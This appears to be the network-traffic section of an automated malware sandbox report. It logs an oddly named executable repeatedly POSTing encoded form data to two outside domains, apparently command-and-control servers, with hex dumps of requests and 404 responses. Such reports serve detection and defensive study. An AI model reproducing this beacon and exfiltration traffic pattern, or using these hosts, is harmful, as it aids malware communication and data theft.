                                                                                  Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  34192.168.2.550015209.74.77.109803812C:\Program Files (x86)\gFGqeaWqpCObVJdzrccxBgzYNETtKfLEBKNnEuNERPFyzzWJpUVvFafGUP\pDqSqZXvqQcT.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Nov 27, 2024 01:28:06.065623999 CET635OUTPOST /6gtt/ HTTP/1.1
                                                                                  Host: www.gogawithme.live
                                                                                  Accept: */*
                                                                                  Accept-Encoding: gzip, deflate
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Origin: http://www.gogawithme.live
                                                                                  Cache-Control: max-age=0
                                                                                  Content-Length: 226
                                                                                  Connection: close
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Referer: http://www.gogawithme.live/6gtt/
                                                                                  User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MATMJS)
                                                                                  Data Raw: 6c 48 5f 4c 34 3d 66 45 6f 55 73 33 78 62 74 43 48 52 4f 37 52 64 6d 39 4f 4a 74 59 69 53 69 78 72 7a 64 2f 66 6f 4c 5a 69 73 58 76 54 75 4a 41 54 76 33 75 37 6f 65 46 71 46 66 2b 65 69 6e 79 4a 38 31 2b 5a 68 32 61 6a 43 55 61 4f 63 6c 50 61 41 46 75 63 6a 2f 62 44 73 50 64 44 58 54 43 33 54 79 4e 56 35 45 6e 6a 76 2f 6e 4f 37 4b 58 43 64 41 66 39 4a 76 41 4d 49 32 61 47 4b 38 47 52 4e 56 42 30 35 66 62 54 38 48 4f 51 56 67 47 42 57 68 73 44 79 6f 52 31 44 51 71 4b 6c 68 46 37 4f 75 63 32 4d 5a 41 76 31 31 6e 52 6d 4e 54 57 73 34 75 75 54 4b 42 6c 65 6c 57 77 51 78 47 4f 48 6b 6d 6e 7a 67 34 6a 55 4d 42 68 62 2b 67 6b 59 75 31 6c 63 54 69 42 72 47 76 73 74 7a 54 41 54
                                                                                  Data Ascii: lH_L4=fEoUs3xbtCHRO7Rdm9OJtYiSixrzd/foLZisXvTuJATv3u7oeFqFf+einyJ81+Zh2ajCUaOclPaAFucj/bDsPdDXTC3TyNV5Enjv/nO7KXCdAf9JvAMI2aGK8GRNVB05fbT8HOQVgGBWhsDyoR1DQqKlhF7Ouc2MZAv11nRmNTWs4uuTKBlelWwQxGOHkmnzg4jUMBhb+gkYu1lcTiBrGvstzTAT
                                                                                  Nov 27, 2024 01:28:07.281994104 CET533INHTTP/1.1 404 Not Found
                                                                                  Date: Wed, 27 Nov 2024 00:28:07 GMT
                                                                                  Server: Apache
                                                                                  Content-Length: 389
                                                                                  Connection: close
                                                                                  Content-Type: text/html
                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                                  Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  35192.168.2.550016209.74.77.109803812C:\Program Files (x86)\gFGqeaWqpCObVJdzrccxBgzYNETtKfLEBKNnEuNERPFyzzWJpUVvFafGUP\pDqSqZXvqQcT.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Nov 27, 2024 01:28:08.724385977 CET1652OUTPOST /6gtt/ HTTP/1.1
                                                                                  Host: www.gogawithme.live
                                                                                  Accept: */*
                                                                                  Accept-Encoding: gzip, deflate
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Origin: http://www.gogawithme.live
                                                                                  Cache-Control: max-age=0
                                                                                  Content-Length: 1242
                                                                                  Connection: close
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Referer: http://www.gogawithme.live/6gtt/
                                                                                  User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MATMJS)
                                                                                  Data Raw: 6c 48 5f 4c 34 3d 66 45 6f 55 73 33 78 62 74 43 48 52 4f 37 52 64 6d 39 4f 4a 74 59 69 53 69 78 72 7a 64 2f 66 6f 4c 5a 69 73 58 76 54 75 4a 44 7a 76 32 63 7a 6f 66 6b 71 46 65 2b 65 69 75 53 4a 78 31 2b 5a 34 32 5a 54 5a 55 61 43 69 6c 4c 71 41 46 49 51 6a 2b 75 33 73 57 74 44 58 63 69 33 53 76 64 56 57 45 6b 4c 72 2f 6e 65 37 4b 58 43 64 41 5a 78 4a 68 45 34 49 6c 71 47 4a 30 6d 52 2f 52 42 30 42 66 59 69 42 48 4e 38 76 6a 31 5a 57 68 4d 54 79 72 6a 74 44 66 71 4b 6e 79 31 36 52 75 63 71 74 5a 41 7a 35 31 6d 6c 41 4e 52 57 73 34 66 53 4f 52 77 6b 43 35 56 67 4a 32 48 4f 4d 34 78 48 71 75 35 53 37 49 57 64 61 79 31 63 4f 73 6c 4e 47 52 44 6f 37 64 65 78 36 6a 48 31 72 33 65 68 36 49 36 4d 2b 48 75 2f 66 70 57 62 4e 57 77 45 6a 31 68 46 51 63 68 6c 58 47 2f 79 45 53 30 76 4c 45 37 73 4d 34 6e 67 47 2f 6a 37 41 7a 33 4d 61 65 6e 59 78 71 7a 79 5a 41 6d 51 30 7a 49 4c 4d 44 46 4b 57 6f 6b 47 67 42 77 72 75 45 65 5a 5a 64 2f 56 69 46 37 54 61 41 51 47 72 59 50 65 52 31 53 72 68 53 39 33 79 74 65 34 67 [TRUNCATED]
                                                                                  Data Ascii: lH_L4=fEoUs3xbtCHRO7Rdm9OJtYiSixrzd/foLZisXvTuJDzv2czofkqFe+eiuSJx1+Z42ZTZUaCilLqAFIQj+u3sWtDXci3SvdVWEkLr/ne7KXCdAZxJhE4IlqGJ0mR/RB0BfYiBHN8vj1ZWhMTyrjtDfqKny16RucqtZAz51mlANRWs4fSORwkC5VgJ2HOM4xHqu5S7IWday1cOslNGRDo7dex6jH1r3eh6I6M+Hu/fpWbNWwEj1hFQchlXG/yES0vLE7sM4ngG/j7Az3MaenYxqzyZAmQ0zILMDFKWokGgBwruEeZZd/ViF7TaAQGrYPeR1SrhS93yte4ggl0ry8s60ngHQm7KTU2X4RSSGcimiZ8VHwfPZx0uJD9iu0nRhaX686xPiNL/9q42GHrp184LylIgb7cJL30i/cKEk5N9LfvX3uATQPXfQDpgXi5n3/NzYnxvAOVp4Zx+1ZUjDnKOxyN62PCjgL44nSFdSzG+1RbyJCi7hj0NwvmJdxTfbf89CJ2PB8n6XhxJ5z+KwqpzISVE4NfiLo2EXunuwCP/gH62IHACfSPPpZ6pKn2XDVEX5vkpv68N0XlS31UPwMTidmTeTMWwF0rtl+eIlIETAms3rmEduB/VnEt9JbQNZ+uD0XJ4cDEmlgcrftl2q9bxXQkuSx2y53xzQq550zL2mwF9GFAAoXkjeaJNvmUVZF4TI5YNDJSXI8WXB13TsU6nHZB1S89misI/D4ytutIuXiQvEjloviTo0aGXosKC9gsBVoVWkGo30UWHS3e6ge6dVmvINtc3iMdT6MzpxmQUYXCIFwqxDzNsU22mndPbfABLscbY20h/eNydP1JEHhM7/3Vb9H9oPnPISnjVWaA0QN5vix/8B2xQJkb4Sv0l5b0HGIj4Ql53QSEeRWb7iFC6Y0297aHXEZSqMRyJtfhGXx4TNk36z3Xvk3zmxmGjHNNNckMEUNxqzrkiexZ/RdOcBmfH6rUuASN7aGw4N0cAW6Jmmt [TRUNCATED]
                                                                                  Nov 27, 2024 01:28:09.999281883 CET533INHTTP/1.1 404 Not Found
                                                                                  Date: Wed, 27 Nov 2024 00:28:09 GMT
                                                                                  Server: Apache
                                                                                  Content-Length: 389
                                                                                  Connection: close
                                                                                  Content-Type: text/html
                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                                  Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  36192.168.2.550017209.74.77.109803812C:\Program Files (x86)\gFGqeaWqpCObVJdzrccxBgzYNETtKfLEBKNnEuNERPFyzzWJpUVvFafGUP\pDqSqZXvqQcT.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Nov 27, 2024 01:28:11.537964106 CET361OUTGET /6gtt/?lH_L4=SGA0vAB7ljjiJZBksJb1gqec1i3dMNjZK6uCbLTCC3HP5ur0cn6Abe6/hzp/g4dh4YOAUYGeqr6sPYYs6bnbftG3TST47at8LnD6yWitNli0aOZiiyErkaGZ0ExcXW9KKA==&005PE=aNcLxhD894SLKl HTTP/1.1
                                                                                  Host: www.gogawithme.live
                                                                                  Accept: */*
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Connection: close
                                                                                  User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MATMJS)
                                                                                  Nov 27, 2024 01:28:12.844492912 CET548INHTTP/1.1 404 Not Found
                                                                                  Date: Wed, 27 Nov 2024 00:28:12 GMT
                                                                                  Server: Apache
                                                                                  Content-Length: 389
                                                                                  Connection: close
                                                                                  Content-Type: text/html; charset=utf-8
                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                                  Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  37192.168.2.550018161.97.142.144803812C:\Program Files (x86)\gFGqeaWqpCObVJdzrccxBgzYNETtKfLEBKNnEuNERPFyzzWJpUVvFafGUP\pDqSqZXvqQcT.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Nov 27, 2024 01:28:18.467114925 CET606OUTPOST /jm2l/ HTTP/1.1
                                                                                  Host: www.54248711.xyz
                                                                                  Accept: */*
                                                                                  Accept-Encoding: gzip, deflate
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Origin: http://www.54248711.xyz
                                                                                  Cache-Control: max-age=0
                                                                                  Content-Length: 206
                                                                                  Connection: close
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Referer: http://www.54248711.xyz/jm2l/
                                                                                  User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MATMJS)
                                                                                  Data Raw: 6c 48 5f 4c 34 3d 42 30 64 43 6f 4b 74 49 47 71 47 63 74 7a 6f 72 2b 61 37 63 45 31 4b 56 78 75 79 70 33 69 66 33 49 70 7a 78 44 79 51 76 55 44 56 73 56 62 30 41 35 55 6b 30 4a 6f 6c 5a 47 59 61 73 75 2b 64 39 70 51 74 43 31 50 42 76 47 41 56 35 78 78 59 71 69 63 57 39 6a 64 35 49 6f 75 41 57 54 4d 52 30 69 42 78 37 50 56 4a 4e 2b 42 66 44 34 6a 4b 42 65 34 78 46 58 6c 73 47 6d 2f 30 6f 68 32 4e 74 4e 4e 6d 65 2b 48 6c 78 58 67 77 33 54 5a 56 75 67 68 69 78 55 65 6d 74 64 2b 41 4d 35 33 72 64 32 6b 6b 34 39 36 53 59 56 50 76 45 79 78 73 63 41 48 39 4c 5a 34 63 33 57 4f 77 6c 54 55 4b 38 4f 64 53 41 6e 71 67 3d
                                                                                  Data Ascii: lH_L4=B0dCoKtIGqGctzor+a7cE1KVxuyp3if3IpzxDyQvUDVsVb0A5Uk0JolZGYasu+d9pQtC1PBvGAV5xxYqicW9jd5IouAWTMR0iBx7PVJN+BfD4jKBe4xFXlsGm/0oh2NtNNme+HlxXgw3TZVughixUemtd+AM53rd2kk496SYVPvEyxscAH9LZ4c3WOwlTUK8OdSAnqg=
                                                                                  Nov 27, 2024 01:28:19.747399092 CET1236INHTTP/1.1 404 Not Found
                                                                                  Server: nginx
                                                                                  Date: Wed, 27 Nov 2024 00:28:19 GMT
                                                                                  Content-Type: text/html; charset=utf-8
                                                                                  Transfer-Encoding: chunked
                                                                                  Connection: close
                                                                                  Vary: Accept-Encoding
                                                                                  ETag: W/"66cce1df-b96"
                                                                                  Content-Encoding: gzip
                                                                                  Data Raw: 35 34 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 8d 56 59 8f db 36 10 7e 76 7e 05 a3 22 48 0b 2c 69 1e a2 0e c7 5e 34 d9 26 68 1e 72 a0 db a2 e8 53 c0 95 28 4b 5d 59 74 24 da 5e a7 c8 7f ef 50 d7 ca 76 82 16 ba c8 99 f9 e6 e2 70 a8 e5 d3 5f 3e dc fc fe d7 c7 d7 28 b7 9b f2 fa c9 d2 7d 50 a9 aa f5 ca d3 95 77 fd 64 b6 cc b5 4a e1 3b 5b 6e b4 55 28 c9 55 dd 68 bb f2 76 36 c3 91 87 e6 8f ac 4a 6d f4 ca db 17 fa b0 35 b5 f5 50 62 2a ab 2b 10 3d 14 a9 cd 57 a9 de 17 89 c6 ed e4 0a 15 55 61 0b 55 e2 26 51 a5 5e b1 41 91 2d 6c a9 af 3f aa b5 46 ef 8d 45 6f cc ae 4a 97 f3 8e ea f8 8d 3d 76 a3 d9 9d 49 8f e8 1f 37 9a dd a9 e4 7e 5d 3b 51 9c 98 d2 d4 0b f4 43 26 dd f5 a2 65 6f 54 bd 2e 2a 6c cd 76 81 a2 67 1d 6d 90 93 a9 bb 3a 5a 06 fe e2 4c 6d 8a f2 b8 40 58 6d b7 a5 c6 cd b1 b1 7a 73 85 5e 95 45 75 ff 4e 25 b7 ed fc 0d 48 5e 21 ef 56 af 8d 46 7f bc f5 ae d0 6f e6 ce 58 03 b4 5f 75 b9 d7 b6 48 14 7a af 77 1a 38 2f 6b 08 f3 aa 35 30 f3 20 26 83 6e 55 d5 00 a3 81 0f 6e 74 5d 64 00 7b e9 ac a1 1b e7 15 7a bd 31 7f [TRUNCATED]
                                                                                  Data Ascii: 54eVY6~v~"H,i^4&hrS(K]Yt$^Pvp_>(}PwdJ;[nU(Uhv6Jm5Pb*+=WUaU&Q^A-l?FEoJ=vI7~];QC&eoT.*lvgm:ZLm@Xmzs^EuN%H^!VFoX_uHzw8/k50 &nUnt]d{z1D7()St7JawG.z|Q&8UjXB]O;g}|5@Ro&i<b)~KmA5n*)55AZ,/svWrt1J;^lJ(?}in`yqB 3ZcNqE^x$W,zkS3'xPuKt$:!f$iUw?:!arVF*&P&mFWgC!;cC;xpUafKpZXzUR1k.1Z`?cVC4l- v\^x<XTM=z#zBqg[e_Ynwv2?tf.)x rkp8 ^9tGIw2+"$/V|NRkPqcq?mDEN&BFtKGQ/xI %iO|CqCJAtV"|"@(3'!A>0HpL(pHP8G,$Qc
                                                                                  Nov 27, 2024 01:28:19.747461081 CET370INData Raw: ee 1c 82 a8 28 61 4c 60 21 49 08 3e c9 90 08 3a ce 38 25 3e 8f 21 99 be 04 2b a0 46 10 06 01 f5 33 e1 dc 8e 80 cb 7c 12 87 01 06 8b 22 10 2e 9a 20 08 31 70 a5 f0 91 10 8e 77 c3 fd 10 6c 43 2e 44 44 a4 fb b2 00 b2 05 38 9f 75 e3 38 d8 fb b0 02 e0
                                                                                  Data Ascii: (aL`!I>:8%>!+F3|". 1pwlC.DD8u8'/]tt0{{"G8A~[F`\075"J0B,FM@y#zJaac8;)76EO=m?5L


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  38192.168.2.550019161.97.142.144803812C:\Program Files (x86)\gFGqeaWqpCObVJdzrccxBgzYNETtKfLEBKNnEuNERPFyzzWJpUVvFafGUP\pDqSqZXvqQcT.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Nov 27, 2024 01:28:21.130261898 CET626OUTPOST /jm2l/ HTTP/1.1
                                                                                  Host: www.54248711.xyz
                                                                                  Accept: */*
                                                                                  Accept-Encoding: gzip, deflate
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Origin: http://www.54248711.xyz
                                                                                  Cache-Control: max-age=0
                                                                                  Content-Length: 226
                                                                                  Connection: close
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Referer: http://www.54248711.xyz/jm2l/
                                                                                  User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MATMJS)
                                                                                  Data Raw: 6c 48 5f 4c 34 3d 42 30 64 43 6f 4b 74 49 47 71 47 63 69 7a 34 72 38 39 48 63 4d 31 4b 57 30 75 79 70 73 53 66 4e 49 70 50 78 44 33 70 6f 55 32 46 73 57 36 45 41 34 57 41 30 45 49 6c 5a 4d 34 61 74 6a 65 63 51 70 52 51 31 31 4c 42 76 47 41 42 35 78 77 6f 71 69 72 4b 2b 78 64 35 4b 68 4f 41 55 4f 63 52 30 69 42 78 37 50 56 4e 72 2b 46 7a 44 34 53 36 42 63 61 56 47 55 6c 73 5a 68 2f 30 6f 6c 32 4e 54 4e 4e 6d 34 2b 47 34 61 58 6a 49 33 54 59 6c 75 67 30 65 77 66 65 6d 72 54 65 42 4f 39 47 53 30 78 6c 31 31 35 34 71 66 4e 2f 37 79 2b 6e 64 32 61 6c 31 6a 4b 59 77 50 47 64 34 53 43 6b 72 56 55 2b 43 77 35 39 32 37 30 4d 34 56 72 53 52 6c 59 44 48 52 35 52 4f 33 6d 73 73 5a
                                                                                  Data Ascii: lH_L4=B0dCoKtIGqGciz4r89HcM1KW0uypsSfNIpPxD3poU2FsW6EA4WA0EIlZM4atjecQpRQ11LBvGAB5xwoqirK+xd5KhOAUOcR0iBx7PVNr+FzD4S6BcaVGUlsZh/0ol2NTNNm4+G4aXjI3TYlug0ewfemrTeBO9GS0xl1154qfN/7y+nd2al1jKYwPGd4SCkrVU+Cw59270M4VrSRlYDHR5RO3mssZ
                                                                                  Nov 27, 2024 01:28:22.408601999 CET1236INHTTP/1.1 404 Not Found
                                                                                  Server: nginx
                                                                                  Date: Wed, 27 Nov 2024 00:28:22 GMT
                                                                                  Content-Type: text/html; charset=utf-8
                                                                                  Transfer-Encoding: chunked
                                                                                  Connection: close
                                                                                  Vary: Accept-Encoding
                                                                                  ETag: W/"66cce1df-b96"
                                                                                  Content-Encoding: gzip
                                                                                  Data Raw: 35 34 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 8d 56 59 8f db 36 10 7e 76 7e 05 a3 22 48 0b 2c 69 1e a2 0e c7 5e 34 d9 26 68 1e 72 a0 db a2 e8 53 c0 95 28 4b 5d 59 74 24 da 5e a7 c8 7f ef 50 d7 ca 76 82 16 ba c8 99 f9 e6 e2 70 a8 e5 d3 5f 3e dc fc fe d7 c7 d7 28 b7 9b f2 fa c9 d2 7d 50 a9 aa f5 ca d3 95 77 fd 64 b6 cc b5 4a e1 3b 5b 6e b4 55 28 c9 55 dd 68 bb f2 76 36 c3 91 87 e6 8f ac 4a 6d f4 ca db 17 fa b0 35 b5 f5 50 62 2a ab 2b 10 3d 14 a9 cd 57 a9 de 17 89 c6 ed e4 0a 15 55 61 0b 55 e2 26 51 a5 5e b1 41 91 2d 6c a9 af 3f aa b5 46 ef 8d 45 6f cc ae 4a 97 f3 8e ea f8 8d 3d 76 a3 d9 9d 49 8f e8 1f 37 9a dd a9 e4 7e 5d 3b 51 9c 98 d2 d4 0b f4 43 26 dd f5 a2 65 6f 54 bd 2e 2a 6c cd 76 81 a2 67 1d 6d 90 93 a9 bb 3a 5a 06 fe e2 4c 6d 8a f2 b8 40 58 6d b7 a5 c6 cd b1 b1 7a 73 85 5e 95 45 75 ff 4e 25 b7 ed fc 0d 48 5e 21 ef 56 af 8d 46 7f bc f5 ae d0 6f e6 ce 58 03 b4 5f 75 b9 d7 b6 48 14 7a af 77 1a 38 2f 6b 08 f3 aa 35 30 f3 20 26 83 6e 55 d5 00 a3 81 0f 6e 74 5d 64 00 7b e9 ac a1 1b e7 15 7a bd 31 7f [TRUNCATED]
                                                                                  Data Ascii: 54eVY6~v~"H,i^4&hrS(K]Yt$^Pvp_>(}PwdJ;[nU(Uhv6Jm5Pb*+=WUaU&Q^A-l?FEoJ=vI7~];QC&eoT.*lvgm:ZLm@Xmzs^EuN%H^!VFoX_uHzw8/k50 &nUnt]d{z1D7()St7JawG.z|Q&8UjXB]O;g}|5@Ro&i<b)~KmA5n*)55AZ,/svWrt1J;^lJ(?}in`yqB 3ZcNqE^x$W,zkS3'xPuKt$:!f$iUw?:!arVF*&P&mFWgC!;cC;xpUafKpZXzUR1k.1Z`?cVC4l- v\^x<XTM=z#zBqg[e_Ynwv2?tf.)x rkp8 ^9tGIw2+"$/V|NRkPqcq?mDEN&BFtKGQ/xI %iO|CqCJAtV"|"@(3'!A>0HpL(pHP8G,$Qc
                                                                                  Nov 27, 2024 01:28:22.408643007 CET370INData Raw: ee 1c 82 a8 28 61 4c 60 21 49 08 3e c9 90 08 3a ce 38 25 3e 8f 21 99 be 04 2b a0 46 10 06 01 f5 33 e1 dc 8e 80 cb 7c 12 87 01 06 8b 22 10 2e 9a 20 08 31 70 a5 f0 91 10 8e 77 c3 fd 10 6c 43 2e 44 44 a4 fb b2 00 b2 05 38 9f 75 e3 38 d8 fb b0 02 e0
                                                                                  Data Ascii: (aL`!I>:8%>!+F3|". 1pwlC.DD8u8'/]tt0{{"G8A~[F`\075"J0B,FM@y#zJaac8;)76EO=m?5L


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  39192.168.2.550020161.97.142.144803812C:\Program Files (x86)\gFGqeaWqpCObVJdzrccxBgzYNETtKfLEBKNnEuNERPFyzzWJpUVvFafGUP\pDqSqZXvqQcT.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Nov 27, 2024 01:28:23.805068970 CET1643OUTPOST /jm2l/ HTTP/1.1
                                                                                  Host: www.54248711.xyz
                                                                                  Accept: */*
                                                                                  Accept-Encoding: gzip, deflate
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Origin: http://www.54248711.xyz
                                                                                  Cache-Control: max-age=0
                                                                                  Content-Length: 1242
                                                                                  Connection: close
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Referer: http://www.54248711.xyz/jm2l/
                                                                                  User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MATMJS)
                                                                                  Data Raw: 6c 48 5f 4c 34 3d 42 30 64 43 6f 4b 74 49 47 71 47 63 69 7a 34 72 38 39 48 63 4d 31 4b 57 30 75 79 70 73 53 66 4e 49 70 50 78 44 33 70 6f 55 31 6c 73 57 4d 51 41 35 32 38 30 46 49 6c 5a 53 6f 61 67 6a 65 64 53 70 52 49 35 31 4c 4e 52 47 44 35 35 77 54 77 71 70 35 69 2b 72 4e 35 4b 2b 65 41 5a 54 4d 52 68 69 42 67 38 50 56 64 72 2b 46 7a 44 34 51 69 42 4b 59 78 47 5a 46 73 47 6d 2f 30 30 68 32 4d 2b 4e 4c 50 4e 2b 47 73 73 58 7a 6f 33 54 34 31 75 7a 57 32 77 44 4f 6d 70 65 2b 42 73 39 48 75 76 78 6c 6f 47 35 38 6a 4b 4e 39 72 79 39 79 6f 53 48 52 78 76 57 61 6b 77 4b 39 6f 52 56 42 50 48 56 75 6d 33 7a 4f 75 2f 35 34 77 41 6f 6b 6c 2f 53 41 69 70 75 31 36 38 6a 70 46 48 47 70 51 35 44 2b 59 4a 2f 49 62 48 4d 5a 2b 72 43 6b 49 6f 4d 57 4d 42 65 4f 36 7a 5a 4c 62 59 77 6b 75 74 6a 4a 44 2b 59 55 69 72 6b 56 52 61 7a 7a 54 37 38 4d 62 41 65 71 52 62 62 4d 72 63 59 30 51 64 50 33 38 63 4f 4e 2b 77 71 58 77 4c 67 74 49 54 6e 4d 67 75 31 38 4b 4d 4e 48 2b 48 46 7a 41 55 73 31 75 6a 36 49 77 48 76 58 4f 33 [TRUNCATED]
